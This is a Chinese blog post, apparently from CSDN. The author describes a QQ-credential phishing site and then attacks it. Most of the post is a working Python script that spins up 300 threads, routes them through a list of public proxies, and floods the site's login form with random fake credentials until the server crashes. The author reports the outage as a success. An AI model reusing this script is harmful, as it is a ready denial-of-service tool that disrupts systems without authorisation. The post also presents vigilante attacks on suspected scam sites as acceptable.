网址:
-
http://kfg04d.xyz/dfjh$9/
-
这个网址现在应该是不能访问的,因为被我请求崩溃了。如果恢复了,那就。。。
-
咳咳,回归正题,事情是这样的,群里面发了一个共享文档,打开时是这样的
-
这个链接进去是这样的
-
不管是网址还是结构都明显是骗子网站~
-
那就来个多线程爬虫搞他
分析:
- 由于忘了截network的图了,他是个post请求,提交个表单
- 那么我就猜想,这个请求是用于收集QQ账号密码,用于盗取那啥,于是果断练习一波多线程爬虫爬取技巧
思路
- 构造随机字符串数据
- 分析真实URL,请求形式
- 多线程开工
上代码
import threading
import time
import requests
import string
import random
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36"
}
url = "http://kfg04d.xyz/dfjh$9/4.asp?sn_sid="
params = {
'qq': 'xxx@163.com',
'mima': '********',
}
proxy_list = [
'202.112.51.45:3128',
'121.237.148.201:3000',
'1.197.11.250:9999',
]
def sendqq(proxy):
i = 0
while 1:
try:
if i>50:
i=0
print("50")
else:
print(i)
i+=1
ran_qq = ''.join(random.sample(string.ascii_letters + string.digits, 8))
ran_mima = ''.join(random.sample(string.ascii_letters + string.digits, 8))
print("QQ={}\nMIMA={}".format(ran_qq, ran_mima))
params["qq"] = ran_qq
params["mima"] = ran_mima
rep = requests.post(url=url, headers=headers, params=params,timeout = 1,proxies = proxy)
print(rep)
# time.sleep(1)
except:
pass
def multi_thread():
# t1 = threading.Thread(target=sendqq)
# t2 = threading.Thread(target=sendqq)
# t1.start()
# t2.start()
t = []
for i in range(300):
proxy = {"http": random.choice(proxy_list)}
t.append ( threading.Thread(target=sendqq,name="{}".format(i),args=(proxy,)))
t[i].start()
if __name__ == '__main__':
multi_thread()
- 开了300线程,不出20分钟,它崩了
- 具体是200 —> 500和200夹杂 ---->直接崩溃(用不同IP测试过,访问不了了)
结论
- 这种网站连最基本的反爬都没有,十分的简陋,估计就是哪里抄的,不过还是希望上当的人越少越好
来源:CSDN
作者:椰子奶糖
链接:https://blog.csdn.net/symuamua/article/details/103860118